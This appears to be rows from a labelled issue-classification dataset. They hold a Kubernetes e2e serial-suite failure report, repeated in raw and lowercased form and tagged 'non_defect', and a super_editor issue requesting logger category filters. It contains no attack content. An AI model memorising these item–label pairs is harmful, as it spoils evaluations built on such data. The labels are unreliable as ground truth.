Failed: [k8s.io] Kubelet [Serial] [Slow] [k8s.io] regular resource usage tracking resource tracking for 0 pods per node {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #26784 #28384
Failed: [k8s.io] SchedulerPredicates [Serial] validates that a pod with an invalid podAffinity is rejected because of the LabelSelectorRequirement is invalid {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] Kubelet [Serial] [Slow] [k8s.io] regular resource usage tracking resource tracking for 100 pods per node {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:132
Aug 30 21:34:54.277: All nodes should be ready after test, Get https://104.197.14.98/api/v1/nodes: dial tcp 104.197.14.98:443: i/o timeout
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:408
```
Issues about this test specifically: #26982
Failed: [k8s.io] Etcd failure [Disruptive] should recover from network partition with master {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #29512
Failed: [k8s.io] Rescheduler [Serial] should ensure that critical pod is scheduled in case there is no resources available {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #31277 #31347 #31710
Failed: [k8s.io] SchedulerPredicates [Serial] validates that Inter-pod-Affinity is respected if not matching {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] Nodes [Disruptive] [k8s.io] Resize [Slow] should be able to add nodes {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27470 #30156
Failed: [k8s.io] Daemon set [Serial] should run and stop complex daemon {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] SchedulerPredicates [Serial] validates resource limits of pods that are allowed to run [Conformance] {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27115 #28070 #30747 #31341
Failed: [k8s.io] Restart [Disruptive] should restart all nodes and ensure all nodes and pods recover {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #26744 #26929
Failed: [k8s.io] [HPA] Horizontal pod autoscaling (scale resource: CPU) [k8s.io] [Serial] [Slow] ReplicationController Should scale from 1 pod to 3 pods and from 3 to 5 and verify decision stability {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27479 #27675 #28097 #30571
Previous issues for this suite: #26743 #27118 #27320
|
1.0
|
kubernetes-e2e-gce-serial: broken test run - https://k8s-gubernator.appspot.com/build/kubernetes-jenkins/logs/kubernetes-e2e-gce-serial/2050/
Multiple broken tests:
Failed: [k8s.io] SchedulerPredicates [Serial] validates that NodeAffinity is respected if not matching {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #28019
Failed: [k8s.io] SchedulerPredicates [Serial] validates that embedding the JSON PodAffinity and PodAntiAffinity setting as a string in the annotation value work {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] Daemon set [Serial] should run and stop complex daemon with node affinity {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #30441
Failed: [k8s.io] SchedulerPredicates [Serial] validates that InterPodAntiAffinity is respected if matching 2 {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #30078 #30142
Failed: [k8s.io] [HPA] Horizontal pod autoscaling (scale resource: CPU) [k8s.io] [Serial] [Slow] Deployment Should scale from 5 pods to 3 pods and from 3 to 1 {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27406 #27669 #29770
Failed: [k8s.io] Nodes [Disruptive] [k8s.io] Network when a node becomes unreachable All pods on the unreachable node should be marked as NotReady upon the node turn NotReady AND all pods should be mark back to Ready when the node get back to Ready before pod eviction timeout {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #30187
Failed: [k8s.io] SchedulerPredicates [Serial] validates that InterPod Affinity and AntiAffinity is respected if matching {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] SchedulerPredicates [Serial] validates that InterPodAffinity is respected if matching with multiple Affinities {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] Namespaces [Serial] should ensure that all pods are removed when a namespace is deleted. {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] DaemonRestart [Disruptive] Controller Manager should not create/delete replicas across restart {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] DaemonRestart [Disruptive] Kubelet should not restart containers across restart {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27502 #28722
Failed: [k8s.io] [HPA] Horizontal pod autoscaling (scale resource: CPU) [k8s.io] [Serial] [Slow] Deployment Should scale from 1 pod to 3 pods and from 3 to 5 {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #30317 #31591
Failed: [k8s.io] Nodes [Disruptive] [k8s.io] Network when a node becomes unreachable [replication controller] recreates pods scheduled on the unreachable node AND allows scheduling of pods on a node after it rejoins the cluster {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27324
Failed: [k8s.io] Etcd failure [Disruptive] should recover from SIGKILL {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #29444
Failed: [k8s.io] Kubelet [Serial] [Slow] [k8s.io] regular resource usage tracking resource tracking for 0 pods per node {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #26784 #28384
Failed: [k8s.io] SchedulerPredicates [Serial] validates that a pod with an invalid podAffinity is rejected because of the LabelSelectorRequirement is invalid {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] Kubelet [Serial] [Slow] [k8s.io] regular resource usage tracking resource tracking for 100 pods per node {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:132
Aug 30 21:34:54.277: All nodes should be ready after test, Get https://104.197.14.98/api/v1/nodes: dial tcp 104.197.14.98:443: i/o timeout
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:408
```
Issues about this test specifically: #26982
Failed: [k8s.io] Etcd failure [Disruptive] should recover from network partition with master {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #29512
Failed: [k8s.io] Rescheduler [Serial] should ensure that critical pod is scheduled in case there is no resources available {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #31277 #31347 #31710
Failed: [k8s.io] SchedulerPredicates [Serial] validates that Inter-pod-Affinity is respected if not matching {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] Nodes [Disruptive] [k8s.io] Resize [Slow] should be able to add nodes {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27470 #30156
Failed: [k8s.io] Daemon set [Serial] should run and stop complex daemon {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] SchedulerPredicates [Serial] validates resource limits of pods that are allowed to run [Conformance] {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27115 #28070 #30747 #31341
Failed: [k8s.io] Restart [Disruptive] should restart all nodes and ensure all nodes and pods recover {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #26744 #26929
Failed: [k8s.io] [HPA] Horizontal pod autoscaling (scale resource: CPU) [k8s.io] [Serial] [Slow] ReplicationController Should scale from 1 pod to 3 pods and from 3 to 5 and verify decision stability {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27479 #27675 #28097 #30571
Previous issues for this suite: #26743 #27118 #27320
|
non_defect
|
kubernetes gce serial broken test run multiple broken tests failed schedulerpredicates validates that nodeaffinity is respected if not matching kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed schedulerpredicates validates that embedding the json podaffinity and podantiaffinity setting as a string in the annotation value work kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go failed daemon set should run and stop complex daemon with node affinity kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed schedulerpredicates validates that interpodantiaffinity is respected if matching kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed horizontal pod autoscaling scale resource cpu deployment should scale from pods to pods and from to kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s 
timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed nodes network when a node becomes unreachable all pods on the unreachable node should be marked as notready upon the node turn notready and all pods should be mark back to ready when the node get back to ready before pod eviction timeout kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed schedulerpredicates validates that interpod affinity and antiaffinity is respected if matching kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go failed schedulerpredicates validates that interpodaffinity is respected if matching with multiple affinities kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go failed namespaces should ensure that all pods are removed when a namespace is deleted kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework 
framework go failed daemonrestart controller manager should not create delete replicas across restart kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go failed daemonrestart kubelet should not restart containers across restart kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed horizontal pod autoscaling scale resource cpu deployment should scale from pod to pods and from to kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed nodes network when a node becomes unreachable recreates pods scheduled on the unreachable node and allows scheduling of pods on a node after it rejoins the cluster kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed etcd failure should recover from sigkill kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting 
for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed kubelet regular resource usage tracking resource tracking for pods per node kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed schedulerpredicates validates that a pod with an invalid podaffinity is rejected because of the labelselectorrequirement is invalid kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go failed kubelet regular resource usage tracking resource tracking for pods per node kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go aug all nodes should be ready after test get dial tcp i o timeout go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed etcd failure should recover from network partition with master kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed rescheduler should ensure that critical pod is scheduled in case there is no resources available kubernetes suite go src io kubernetes output dockerized go src io kubernetes test 
framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed schedulerpredicates validates that inter pod affinity is respected if not matching kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go failed nodes resize should be able to add nodes kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed daemon set should run and stop complex daemon kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go failed schedulerpredicates validates resource limits of pods that are allowed to run kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed restart should restart all nodes and ensure all nodes and pods recover kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go 
expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed horizontal pod autoscaling scale resource cpu replicationcontroller should scale from pod to pods and from to and verify decision stability kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically previous issues for this suite
| 0
|
220,547
| 16,963,472,621
|
IssuesEvent
|
2021-06-29 08:04:23
|
srijan-sivakumar/redant
|
https://api.github.com/repos/srijan-sivakumar/redant
|
closed
|
Add supported distro details
|
bug documentation
|
It is required to mention on what all distros redant has been tested ( redant control machine as well as the server and client distros ).
|
1.0
|
Add supported distro details - It is required to mention on what all distros redant has been tested ( redant control machine as well as the server and client distros ).
|
non_defect
|
add supported distro details it is required to mentioned on what all distros redant has been tested redant control machine as well as the server and client distros
| 0
|
77,236
| 26,871,053,758
|
IssuesEvent
|
2023-02-04 13:17:27
|
vector-im/element-web
|
https://api.github.com/repos/vector-im/element-web
|
opened
|
Has the Voice Message codec or processing changed recently ?
|
T-Defect
|
### Steps to reproduce
1. On the web app in a conversation (I only have bridged conversations with bots)
2. I start recording a voice message
3. It records alright and send itself
### Outcome
#### What did you expect?
I think I remember not long ago but the sound seemed almost uncompressed with no major artifacts, this is what I would expect.
#### What happened instead?
The audio is seriously lacking bass and is often getting major artifacts that completely distort the voice, especially when there's a bit of background noise. It seems that there's some sort of noise removal activated, that wasn't here before or maybe I didn't notice but I doubt that.
Is there a way to choose the codec settings for the voice messages, especially the processing part ? At least to remove the noise reduction. I use a professional headset processed in a professional mixer with standard broadcast/radio tools, with monitoring activated. This is not an issue on the input audio side.
### Operating system
Windows 11 22H2
### Browser information
Rambox 2.0.10 so Electron/Chromium but not sure where to find the Version
### URL for webapp
Private server
### Application version
Element version: 1.11.20 Olm version: 3.2.12
### Homeserver
Synapse 1.76.0 (pretty sure)
### Will you send logs?
Yes
|
1.0
|
Has the Voice Message codec or processing changed recently ? - ### Steps to reproduce
1. On the web app in a conversation (I only have bridged conversations with bots)
2. I start recording a voice message
3. It records alright and send itself
### Outcome
#### What did you expect?
I think I remember not long ago but the sound seemed almost uncompressed with no major artifacts, this is what I would expect.
#### What happened instead?
The audio is seriously lacking bass and is often getting major artifacts that completely distort the voice, especially when there's a bit of background noise. It seems that there's some sort of noise removal activated, that wasn't here before or maybe I didn't notice but I doubt that.
Is there a way to choose the codec settings for the voice messages, especially the processing part ? At least to remove the noise reduction. I use a professional headset processed in a professional mixer with standard broadcast/radio tools, with monitoring activated. This is not an issue on the input audio side.
### Operating system
Windows 11 22H2
### Browser information
Rambox 2.0.10 so Electron/Chromium but not sure where to find the Version
### URL for webapp
Private server
### Application version
Element version: 1.11.20 Olm version: 3.2.12
### Homeserver
Synapse 1.76.0 (pretty sure)
### Will you send logs?
Yes
|
defect
|
has the voice message codec or processing changed recently steps to reproduce on the web app in a conversation i only have bridged conversations with bots i start recording a voice message it records alright and send itself outcome what did you expect i think i remember not long ago but the sound seemed almost uncompressed with no major artifacts this is what i would expect what happened instead the audio is seriously lacking bass and is often getting major artifacts that completely distort the voice especially when there s a bit of background noise it seems that there s some sort of noise removal activated that wasn t here before or maybe i didn t notice but i doubt that is there a way to choose the codec settings for the voice messages especially the processing part at least to remove the noise reduction i use a professional headset processed in a professional mixer with standard broadcast radio tools with monitoring activated this is not an issue on the input audio side operating system windows browser information rambox so electron chromium but not sure where to find the version url for webapp private server application version element version olm version homeserver synapse pretty sure will you send logs yes
| 1
|
8,181
| 2,611,469,717
|
IssuesEvent
|
2015-02-27 05:14:55
|
chrsmith/hedgewars
|
https://api.github.com/repos/chrsmith/hedgewars
|
closed
|
Crash app in remote mode
|
auto-migrated Priority-Medium Type-Defect
|
```
What steps will reproduce the problem?
1. click on network
2. click on start server
3. crash
What is the expected output? What do you see instead?
What version of the product are you using? On what operating system?
Please provide any additional information below.
```
Original issue reported on code.google.com by `esteban....@gmail.com` on 2 Feb 2011 at 5:20
* Merged into: #180
|
1.0
|
Crash app in remote mode - ```
What steps will reproduce the problem?
1. click on network
2. click on start server
3. crash
What is the expected output? What do you see instead?
What version of the product are you using? On what operating system?
Please provide any additional information below.
```
Original issue reported on code.google.com by `esteban....@gmail.com` on 2 Feb 2011 at 5:20
* Merged into: #180
|
defect
|
crash app in remote mode what steps will reproduce the problem clic in network clic in start server crash what is the expected output what do you see instead what version of the product are you using on what operating system please provide any additional information below original issue reported on code google com by esteban gmail com on feb at merged into
| 1
|
28,004
| 22,744,783,567
|
IssuesEvent
|
2022-07-07 08:13:13
|
superlistapp/super_editor
|
https://api.github.com/repos/superlistapp/super_editor
|
closed
|
Add category filters to logger
|
type_enhancement area_infrastructure status_needs_analysis
|
The current logging solution doesn't work well because we get all or nothing.
Implement a robust logging solution.
|
1.0
|
